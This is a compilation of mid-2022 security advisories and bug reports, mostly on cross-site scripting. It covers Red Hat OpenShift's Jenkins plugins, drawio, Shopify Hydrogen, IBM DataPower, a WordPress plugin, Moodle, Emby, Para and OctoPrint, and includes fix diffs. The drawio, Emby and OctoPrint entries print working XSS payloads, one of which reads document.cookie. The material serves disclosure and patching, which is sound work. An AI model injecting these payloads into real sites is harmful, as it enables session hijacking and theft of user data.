Red Hat Security Advisory 2022-2205-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.9.33. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.9.33 packages and security update  
Advisory ID:       RHSA-2022:2205-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:2205  
Issue date:        2022-05-18  
CVE Names:         CVE-2022-29036 CVE-2022-29041 CVE-2022-29046  
                   CVE-2022-29047  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.9.33 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.9 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.9.33. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHBA-2022:2206

Security Fix(es):

* Jira: Stored XSS vulnerabilities in Jenkins Jira plugin (CVE-2022-29041)  
* subversion: Stored XSS vulnerabilities in Jenkins subversion plugin  
(CVE-2022-29046)  
* Pipeline Shared Groovy Libraries: Untrusted users can modify some  
Pipeline libraries in Pipeline Shared Groovy Libraries Plugin  
(CVE-2022-29047)  
* credentials: Stored XSS vulnerabilities in jenkins plugin  
(CVE-2022-29036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.9 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2074847 - CVE-2022-29036 credentials: Stored XSS vulnerabilities in jenkins plugin  
2074850 - CVE-2022-29041 Jira: Stored XSS vulnerabilities in Jenkins Jira plugin  
2074851 - CVE-2022-29046 subversion: Stored XSS vulnerabilities in Jenkins subversion plugin  
2074855 - CVE-2022-29047 Pipeline Shared Groovy Libraries: Untrusted users can modify some Pipeline libraries in Pipeline Shared Groovy Libraries Plugin

6. Package List:

Red Hat OpenShift Container Platform 4.9:

Source:  
cri-o-1.22.3-6.rhaos4.9.git388405c.el7.src.rpm

x86_64:  
cri-o-1.22.3-6.rhaos4.9.git388405c.el7.x86_64.rpm  
cri-o-debuginfo-1.22.3-6.rhaos4.9.git388405c.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.9:

Source:  
cri-o-1.22.3-5.rhaos4.9.git388405c.el8.src.rpm  
jenkins-2-plugins-4.9.1651754460-1.el8.src.rpm  
jenkins-2.319.3.1651752848-1.el8.src.rpm

aarch64:  
cri-o-1.22.3-5.rhaos4.9.git388405c.el8.aarch64.rpm  
cri-o-debuginfo-1.22.3-5.rhaos4.9.git388405c.el8.aarch64.rpm  
cri-o-debugsource-1.22.3-5.rhaos4.9.git388405c.el8.aarch64.rpm

noarch:  
jenkins-2-plugins-4.9.1651754460-1.el8.noarch.rpm  
jenkins-2.319.3.1651752848-1.el8.noarch.rpm

ppc64le:  
cri-o-1.22.3-5.rhaos4.9.git388405c.el8.ppc64le.rpm  
cri-o-debuginfo-1.22.3-5.rhaos4.9.git388405c.el8.ppc64le.rpm  
cri-o-debugsource-1.22.3-5.rhaos4.9.git388405c.el8.ppc64le.rpm

s390x:  
cri-o-1.22.3-5.rhaos4.9.git388405c.el8.s390x.rpm  
cri-o-debuginfo-1.22.3-5.rhaos4.9.git388405c.el8.s390x.rpm  
cri-o-debugsource-1.22.3-5.rhaos4.9.git388405c.el8.s390x.rpm

x86_64:  
cri-o-1.22.3-5.rhaos4.9.git388405c.el8.x86_64.rpm  
cri-o-debuginfo-1.22.3-5.rhaos4.9.git388405c.el8.x86_64.rpm  
cri-o-debugsource-1.22.3-5.rhaos4.9.git388405c.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-29036  
https://access.redhat.com/security/cve/CVE-2022-29041  
https://access.redhat.com/security/cve/CVE-2022-29046  
https://access.redhat.com/security/cve/CVE-2022-29047  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYoWMv9zjgjWX9erEAQjBwxAAopw+4MTZjvvbOHIRrXtrLwAbS9p8duS5  
3V0/WLw4HSU81A2HPc0dq2BdyTolwJSoUETRfX40rcTVuf6qVaTa+A2xS9EzyTbU  
6ofmi6Vcj6kg3vXX/oCkbM12ePMeYWbB/LWj40SkcclfVV2cdhOdrxPJFAb/Hwa2  
f8swosCFKNuI52N+KdVGNdz7gQ3YLj0JTtYMbzRBWyAGGfOXPwuyQST5en42w2kG  
ZfszY5IWdhEM6yEIZc4OcsSZSyBsfe8ZgrvhLspzOGJuGcmECoKI3TrKnAGNxfI8  
tahqIpCTd/DfMKqrXe+ZCLgY7fLPB5TSMgRLMedpTsVuFLMw1hB+kjDUDLfhZExw  
z4yb9J3bQgxJ6K7grfE8WzLhUB081hW+59Yp5I6FyKyEv3xRx0u9JowGoUpaBIAx  
oOPm7zDh0tW5rHaMqhQUaLXh+x/ZosnyS4H/QF0FP/MIxO5hLATA9JtRUB8QPF8c  
CbL1FL4mdZQoLcSThZoGLp6tcNriRLMv+qKKgfYHEi23/6rilAWqundsHSmJZiq6  
NCMXrniEJ8nIDCWEdpwcb4ZNLxhVVXu/5iDlTq4NJRD8ITR+8CV7OY0XZiT7AXIG  
mFrTQNsohQA/E1yA/hssJuL3duKylWJE9bhEv/xCFtYZ3sd7uCJ5YoIulQxs37C2  
jyk0h3fqxN0=RQOP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-2205-01

Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 18.0.4.

**Sumary**

Draw io has a feature to put links on a text, due to a bad sanitization it allows to put javascript:// scheme on a anchor tag which allows to execute javascript code

**Steps to reproduce**

1.  Create a text box and set word size to 50
2.  Click with the rigth button and "Edit link"
3.  Put asdf://test.com
4.  Click with the rigth button again and "Edit data"
5.  On the "link" attribute put javascript:javascript://%0aalert(document.domain)
6.  Export the page as URL
7.  Click on the link

**Impact**

It also affects confluence as its available as an app on the marketplace, POC video: https://youtu.be/RHevZOx1nhc

CVE-2022-1730: Stored  XSS on drawio in drawio

Hydrogen is a React-based framework for building dynamic, Shopify-powered custom storefronts. There is a potential Cross-Site Scripting (XSS) vulnerability where an arbitrary user is able to execute scripts on pages that are built with Hydrogen. This affects all versions of Hydrogen starting from version 0.10.0 to 0.18.0. This vulnerability is exploitable in applications whose hydrating data is user controlled. All Hydrogen users should upgrade their project to version 0.19.0. There is no current workaround, and users should update as soon as possible. Additionally, the Content Security Policy is not an effective mitigation for this vulnerability.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-29230: Remove flight chunk by wizardlyhel · Pull Request #1272 · Shopify/hydrogen

IBM DataPower Gateway 10.0.2.0 through 1.0.3.0, 10.0.1.0 through 10.0.1.5, and 2018.4.1.0 through 2018.4.1.18 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 211236.

  

**Summary**

IBM has addressed the CVE

**Vulnerability Details**

**CVEID:**   CVE-2021-38944  
**DESCRIPTION:**   IBM DataPower Gateway is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.  
CVSS Base score: 4.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/211236 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM DataPower Gateway V10CD

10.0.2.0-1.0.3.0

IBM DataPower Gateway 10.0.1

10.0.1.0-10.0.1.5

IBM DataPower Gateway 2018.4.1

2018.4.1.0-2018.4.1.18

  

**Remediation/Fixes**

Affected Product

Fixed in version

APAR

IBM DataPower Gateway V10CD

10.0.4.0

IT39040

IBM DataPower Gateway 10.0.1

10.0.1.6

IT39040

IBM DataPower Gateway 2018.4.1

2018.4.1.19

IT39040

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

17 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU004","label":"Hybrid Cloud"},"Product":{"code":"SSHPHA","label":"IBM DataPower Gateway"},"Component":"","Platform":\[{"code":"PF009","label":"Firmware"}\],"Version":"All","Edition":"All"}\]

CVE-2021-38944: Security Bulletin: IBM DataPower Gateway vulnerable to HTTP header injection

Reflected Cross-Site Scripting (XSS) vulnerability in Code Snippets plugin <= 2.14.3 at WordPress via &orderby vulnerable parameter.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Code Snippets is an easy, clean and simple way to run code snippets on your site. It removes the need to add custom snippets to your theme’s functions.php file.

A snippet is a small chunk of PHP code that you can use to extend the functionality of a WordPress-powered website; essentially a mini-plugin with less load on your site.  
Most snippet-hosting sites tell you to add snippet code to your active theme’s functions.php file, which can get rather long and messy after a while.  
Code Snippets changes that by providing a GUI interface for adding snippets and **actually running them on your site** just as if they were in your theme’s functions.php file.

Code Snippets provides graphical interface, similar to the Plugins menu, for managing snippets. Snippets can be activated and deactivated, just like plugins. The snippet editor includes fields for a name, a visual editor-enabled description, tags to allow you to categorize snippets, and a full-featured code editor. Snippets can be exported for transfer to another site, either in JSON for later importing by the Code Snippets plugin, or in PHP for creating your own plugin or theme.

If you have any feedback, issues, or suggestions for improvements please leave a topic in the Support Forum, or join the community on Facebook.

If you like this plugin, or it is useful to you in some way, please consider reviewing it on WordPress.org.

If you’d like to contribute to the plugin’s code or translate it into another language, you can fork the plugin on GitHub.

**Translations**

Code Snippets can be used in these different languages thanks to the following translators:

*   Belarusian – Hrank.com
*   Brazilian Portuguese – Bruno Borges
*   Chinese – Jincheng Shan and 诗语
*   Chinese (Taiwan) – Alex Lion and Chun-Chih Cheng
*   Croatian – Borisa Djuraskovic from Web Hosting Hub
*   Czech – Lukáš Tesař and Jakub Humpolec
*   Danish – Finn Sommer Jensen
*   Dutch – Sander Spies, Peter Smits and mother.of.code.a11n
*   English (New Zealand) and English (UK) – webaware
*   English (South Africa) – webaware and Ian Barnes
*   French – momo-fr, Didier Demory, Cyrille Sanson and Shea Bunge
*   French (Canada) – Dominic Desbiens
*   German – Mario Siegmann, Joerg Knoerchen, David Decker and Andreas
*   Greek – Konstantinos Megas and Toni Bishop from Jrop
*   Indonesian – Jordan Silaen from ChameleonJohn.com
*   Italian – Usman Wagan, Luisa Ravelli and ElectricFeet
*   Japanese – mt8, Takakazu Nagaya, Naoko Takano and melvas
*   Persian – Mohammad Novintanon
*   Russian – Alexander Samsonov, Yui, Denis Yanchevskiy and krioteh
*   Slovak – Ján Fajčák
*   Spanish (Colombia) and Spanish (Ecuador) – Javier Esteban
*   Spanish (Spain) – Ibidem Group, Javier Esteban, Fernando Tellado and Juanma Aranda
*   Spanish (Venezuela) – Yordan Soares
*   Swedish – Argentum, Fredrik and Tor-Bjorn Fjellner
*   Urdu – Samuel Badree
*   Vietnamese – Tuan Phan

**Automatic installation**

1.  Log into your WordPress admin
2.  Click **Plugins**
3.  Click **Add New**
4.  Search for **Code Snippets**
5.  Click **Install Now** under “Code Snippets”
6.  Activate the plugin

**Manual installation**

1.  Download the plugin
2.  Extract the contents of the zip file
3.  Upload the contents of the zip file to the wp-content/plugins/ folder of your WordPress installation
4.  Activate the Code Snippets plugin from ‘Plugins’ page.

Network Activating Code Snippets through the Network Dashboard will enable a special interface for running snippets across the entire network.

A full list of our Frequently Asked Questions can be found at help.codesnippets.pro.

**How can I recover my site if it is crashed by a buggy snippet?**

You can recover your site by enabling the Code Snippets safe mode feature. Instructions for how to turn it on are available here: https://help.codesnippets.pro/article/12-safe-mode.

**Will I lose my snippets if I change the theme or upgrade WordPress?**

No, the snippets are stored in the WordPress database, independent of the theme and unaffected by WordPress upgrades.

**Can the plugin be completely uninstalled?**

If you enable the ‘Complete Uninstall’ option on the plugin settings page, Code Snippets will clean up all of its data when deleted through the WordPress ‘Plugins’ menu. This includes all stored snippets. If you would like to preserve the snippets, ensure they are exported first.

**Can I copy snippets that I have created to another WordPress site?**

Yes! You can individually export a single snippet using the link below the snippet name on the ‘Manage Snippets’ page or bulk export multiple snippets using the ‘Bulk Actions’ feature. Snippets can later be imported using the ‘Import Snippets’ page by uploading the export file.

**Can I export my snippets to PHP for a site where I’m not using the Code Snippets plugin?**

Yes. Click the checkboxes next to the snippets you want to export, and then choose **Export to PHP** from the Bulk Actions menu and click Apply. The generated PHP file will contain the exported snippets’ code, as well as their name and description in comments.

**Can I run network-wide snippets on a multisite installation?**

You can run snippets across an entire multisite network by **Network Activating** Code Snippets through the Network Dashboard. You can also activate Code Snippets just on the main site, and then individually on other sites of your choice.

**Where are the snippets stored in my WordPress database?**

Snippets are stored in the wp_snippets table in the WordPress database. The table name may differ depending on what your table prefix is set to.

**Where can I go for help or suggest new features?**

You can get help with Code Snippets, report bugs or errors, and suggest new features and improvements either on the WordPress Support Forums or on GitHub

**How can I help contribute to the development of the Code Snippets plugin?**

The best way to do this is to fork the repository on GitHub and send a pull request.

Works perfectly, and safely

Un plugin sencillo, efectivo y limpio. Gracias.

Hi, Firstly it works very well as it is expected. The only thing I did’nt find is how register a new label. As I write a new label it is not registered Thanks a lot for the job

I've been using this plugin for years and I really like its features. Yes, you can disable your site very easily by injecting PHP code, but that is not the fault of the plugin; with great power comes great responsibility.

Read all 366 reviews

“Code Snippets” is open source software. The following people have contributed to this plugin.

Contributors

**3.1.0 (17 May 2022)**

*   Fixed: Caching inconsistencies preventing snippets and settings from refreshing on sites with persistent object caching.
*   Improved: Simplified database queries.
*   Added: More comprehensive cache coverage, including for active snippets.
*   Added: Icon to ‘Go Pro’ button indicating it opens an external tab.
*   Improved: Allow display styles in snippet descriptions.

**3.0.1 (14 May 2022)**

*   Fixed: Incompatibility issue with earlier versions of PHP.

**3.0.0 (14 May 2022)**

**Added**

*   Added: HTML content snippets for displaying as shortcodes or including in the page head or footer area.
*   Added: Notice reminding users to upgrade unsupported PHP versions.
*   Added: Visual settings to add attributes to shortcodes.
*   Added: Shortcode buttons to the post and page content editors.
*   Added: Basic REST API endpoints.
*   Added: Snippet type column to the snippets table.
*   Added: Snippet type badges to Edit and Add New Snippet pages.
*   Added: Setting to control whether the current line of the code editor is highlighted.
*   Added: Display a warning when saving a snippet with missing title or code.
*   Added: Add suffix to title of cloned snippets.

**Changed**

*   Improved: Updated plugin code to use namespaces, preventing name collisions with other plugins.
*   Improved: Added key for the ‘active’ and ‘scope’ database table columns to speed up queries.
*   Improved: Redirect from edit menu if not editing a valid snippet.
*   Improved: Moved activation switch into its own table column.
*   Improved: Updated code documentation according to WordPress standards.
*   Improved: Added snippet type labels to the tabs on the Snippets page.
*   Improved: Split settings page into tabs.
*   Improved: Use the version of CodeMirror included with WordPress where possible to inherit the additional built-in features.
*   Improved: Added hover effect to priority settings in the snippets table to show that they are editable.
*   Fixed: Snippets table layout on smaller screens.

**Deprecated**

*   Removed: Deprecated functions and compatibility code for unsupported PHP versions.
*   Removed: Option to disable snippet scopes.

**New in Pro**

*   Added: CSS style snippets for the site front-end and admin area.
*   Added: JavaScript snippets for the site head and body area on the front-end.
*   Added: Browser cache versioning for CSS and JavaScript snippets.
*   Added: Support for exporting and downloading CSS and JavaScript snippets.
*   Added: Support for highlighting code on the front-end.
*   Added: Editor syntax highlighting for CSS, JavaScript and HTML snippets.
*   Added: Button to preview full file when editing CSS or JavaScript snippets.
*   Added: Option to minify CSS and JavaScript snippets.
*   Added: Gutenberg editor block for displaying content snippets.
*   Added: Gutenberg editor block for displaying snippet source code.
*   Added: Elementor widget for displaying content snippets.
*   Added: Elementor widget for displaying snippet source code.

**2.14.6 (13 May 2022)**

*   Fixed: Issue with processing uploaded import files.
*   Fixed: Issue with processing tag filters.

**2.14.5 (10 May 2022)**

*   Fixed: Incompatibility issue with older versions of PHP.

**2.14.4 (5 May 2022)**

*   Fixed: Prevent array key errors when loading the snippet table with unknown order values.

**2.14.3 (10 Dec 2021)**

*   Fixed: Potential security issue outputting snippets-safe-mode query variable value as-is. Thanks to Krzysztof Zając for reporting.

**2.14.2 (9 Sep 2021)**

*   Fixed: Prevent network snippets table from being created on single-site installs.
*   Added translations:
    *   Spanish by Ibidem Group
    *   Urdu by Samuel Badree
    *   Greek by Toni Bishop from Jrop
*   Added: Support for :class syntax to the code validator.
*   Added: PHP8 support to the code linter.
*   Added: Color picker feature to the code editor.
*   Added: Failsafe to prevent multiple versions of Code Snippets from running simultaneously.

**2.14.1 (10 Mar 2021)**

*   Added: Czech translation by Lukáš Tesař.
*   Fixed: Code validator now supports function_exists and class_exists checks.
*   Fixed: Code validator now supports anonymous functions.
*   Fixed: Issue with saving the hidden columns setting.
*   Fixed: Replaced the outdated tag-it library with tagger for powering the snippet tags editor.
*   Added: Code direction setting for RTL users.
*   Updated CodeMirror to version 5.59.4.
*   Added: Additional action hooks and search API thanks to @Spreeuw.

**2.14.0 (26 Jan 2020)**

*   Updated CodeMirror to version 5.50.2.
*   Added: Basic error checking for duplicate functions and classes.
*   Updated Italian translations to fix display issues – thanks to Francesco Marino.
*   Fixed: Ordering snippets in the table by name will now be case-insensitive.
*   Added: Additional API options for retrieving snippets.
*   Fixed: Code editor will now properly highlight embedded HTML, CSS and JavaScript code.
*   Changed the indicator color for inactive snippets from red to grey.
*   Fixed a bug preventing the editor theme from being set to default.
*   Added: Store the time and date when each snippet was last modified.
*   Added: Basic error checking when activating snippets.
*   Fixed: Ensure that imported snippets are always inactive.
*   Fixed: Check the referer on the import menu to prevent CSRF attacks. Thanks to Chloe with the Wordfence Threat Intelligence team for reporting.
*   Fixed: Ensure that individual snippet action links use proper verification.

**2.13.3 (13 Mar 2019)**

*   Added: Hover effect to activation switches.
*   Added: Additional save buttons above snippet editor.
*   Added: List save keyboard shortcuts to the help tooltip.
*   Added: Change “no items found” message when search filters match nothing.
*   Fixed: Calling deprecated code in database upgrade process.
*   Fixed: Include snippet priority in export files.
*   Fixed: Use Unix newlines in code export file.
*   Updated CodeMirror to version 5.44.0.
*   Fixed: Correctly register snippet tables with WordPress to prevent database repair errors \[#\]
*   Fixed: CodeMirror indentation settings being applied incorrectly

**2.13.2 (25 Jan 2019)**

*   Removed potentially problematic cursor position saving feature

**2.13.1 (22 Jan 2019)**

*   Added: Add menu buttons to settings page for compact menu
*   Updated: French translation updated thanks to momo-fr
*   Fixed: Split code editor and tag editor scripts into their own files to prevent dependency errors
*   Fixed: Handling of single-use shared network snippets
*   Fixed: Minor translation template issues
*   Added: Help tooltop to snippet editor for keyboard shortcuts, thanks to Michael DeWitt
*   Improved: Added button for executing single-use snippets to snippets table
*   Added: Sample snippet for ordering snippets table by name by default
*   Updated CodeMirror to version 5.43.0

**2.13.0 (17 Dec 2018)**

*   Added: Search/replace functionality to the snippet editor. See here for a list of keyboard shortcuts. \[#\]
*   Updated CodeMirror to version 5.42.0
*   Added: Option to make admin menu more compact
*   Fixed: Problem clearing recently active snippet list
*   Improved: Integration between plugin and the CodeMirror library, to prevent collisions
*   Improved: Added additional styles to editor settings preview
*   Added: PHP linter to code editor
*   Improved: Use external scripts instead of inline scripts
*   Fixed: Missing functionality for ‘Auto Close Brackets’ and ‘Highlight Selection Matches’ settings

**2.12.1 (15 Nov 2018)**

*   Improved: CodeMirror updated to version 5.41.0
*   Improved: Attempt to create database columns that might be missing after a table upgrade
*   Improved: Streamlined upgrade process
*   Fixed: Interface layout on sites using right-to-left languages
*   Improved: Made search box appear at top of page on mobile \[#\]
*   Updated screenshots

**2.12.0 (23 Sep 2018)**

*   Fixed: Prevented hidden columns setting from reverting to default
*   Improved: Updated import page to improve usability
*   Improved: Added Import button next to page title on manage page
*   Improved: Added coloured banner indicating whether a snippet is active when editing
*   Update CodeMirror to 5.40.0

**2.11.0 (24 Jul 2018)**

*   Added: Ability to assign a priority to snippets, to determine the order in which they are executed
*   Improvement: The editor cursor position will be preserved when saving a snippet
*   Added: Pressing Ctrl/Cmd + S while writing a snippet will save it
*   Added: Shadow opening PHP tag above the code editor
*   Improved: Updated the message shown when there are no snippets
*   Added: Install sample snippets when the plugin is installed
*   Improved: Show all available tags when selecting the tag field
*   Added: Filter hook for controlling the default list table view
*   Added: Action for cloning snippets

**The full changelog is available on GitHub**

CVE-2022-25617: Code Snippets

A flaw was found in moodle where ID numbers displayed when bulk allocating markers to assignments required additional sanitizing to prevent a stored XSS risk.

No match.

Moodle official production repository

RSS Atom

CVE-2022-30596: Official Moodle git projects - moodle.git/search

Emby Media Server version 4.7.0.60 suffers from a cross site scripting vulnerability.

    # Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting # Google Dork: NA# Date: 18/05/2022# Exploit Author: Yehia Elghaly# Vendor Homepage: https://emby.media/# Software Link: https://emby.media/windows-server.html# Version: 4.7.0.60# Tested on: Windows 7 / 10Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model.Description: Reflected XSS  found on the follwoing paths GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1Host: 192.168.1.99:8096Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0/web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60/web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn /web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60/web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60 /web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60/web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60/web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60/web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60 /web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60/web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60/web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60/web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60/web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60/web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60

Emby Media Server 4.7.0.60 Cross Site Scripting

Cross-site Scripting (XSS) - Generic in GitHub repository erudika/para prior to v1.45.11.

@@ -330,13 +330,13 @@ public static String markdownToHtml(String markdownString, boolean htmlTagsRende

\* @param template a Mustache template

\* @return the compiled template string

\*/

public static String compileMustache(Map<String, Object\> context, String template) {

public static String compileMustache(Map<String, Object\> context, String template, boolean escapeHtml) {

if (context == null || StringUtils.isBlank(template)) {

return "";

}

Writer writer = new StringWriter();

try {

Mustache.compiler().escapeHTML(false).emptyStringIsFalse(true).compile(template).execute(context, writer);

Mustache.compiler().escapeHTML(escapeHtml).emptyStringIsFalse(true).compile(template).execute(context, writer);

} finally {

try {

writer.close();

@@ -347,6 +347,16 @@ public static String compileMustache(Map<String, Object> context, String templat

return writer.toString();

}

  

/\*\*

\* @see #compileMustache(java.util.Map, java.lang.String, boolean)

\* @param context a map of fields and values

\* @param template a Mustache template

\* @return the compiled template string

\*/

public static String compileMustache(Map<String, Object\> context, String template) {

return compileMustache(context, template, false);

}

  

/\*\*

\* Abbreviates a string.

\* @param str a string

CVE-2022-1782: added option to escape HTML when compiling Mustache templates · Erudika/para@9d844f3

Cross-site Scripting (XSS) - DOM in GitHub repository octoprint/octoprint prior to 1.8.0.

@@ -8,6 +8,7 @@

import os

import re

from collections import defaultdict

from urllib.parse import urlparse

  

from flask import (

Response,

@@ -170,7 +171,16 @@ def \_add\_additional\_assets(hook):

def login():

from flask\_login import current\_user

  

redirect\_url \= request.args.get("redirect", request.script\_root + url\_for("index"))

default\_redirect\_url \= request.script\_root + url\_for("index")

redirect\_url \= request.args.get("redirect", default\_redirect\_url)

  

parsed \= urlparse(redirect\_url) \# check if redirect url is valid

if parsed.scheme != "" or parsed.netloc != "":

\_logger.warning(

f"Got an invalid redirect URL with the login attempt, misconfiguration or attack attempt: {redirect\_url}"

)

redirect\_url \= default\_redirect\_url

  

permissions \= sorted(

filter(

lambda x: x is not None and isinstance(x, OctoPrintPermission),

CVE-2022-1430: 🔒️ Sanitize and validate login redirect · OctoPrint/OctoPrint@8087528

Cross-site Scripting (XSS) - Generic in GitHub repository octoprint/octoprint prior to 1.8.0.

**Description**

The Stream URL of octoprint application allowing xss payload to execute for which its leads to Cross-site Scripting (XSS

**Proof of Concept**

Login to the application

Now go to settings -> Webcam & Timelapse -> Stream URL and insert the payload "<img src=1 onerror=alert(document.cookie)> in the Stream URL and click on "Test"

You will see that its making a internal GET request

**Image POC**

    https://drive.google.com/drive/folders/1gvRKz8AKOY8XE3O3z4mJdr61heIxGtH7?usp=sharing
    

**Impact**

User accounts can be hijacked, credentials could be stolen, sensitive data could be exfiltrated, and lastly, access to your client computers can be obtained.

Tag

#xss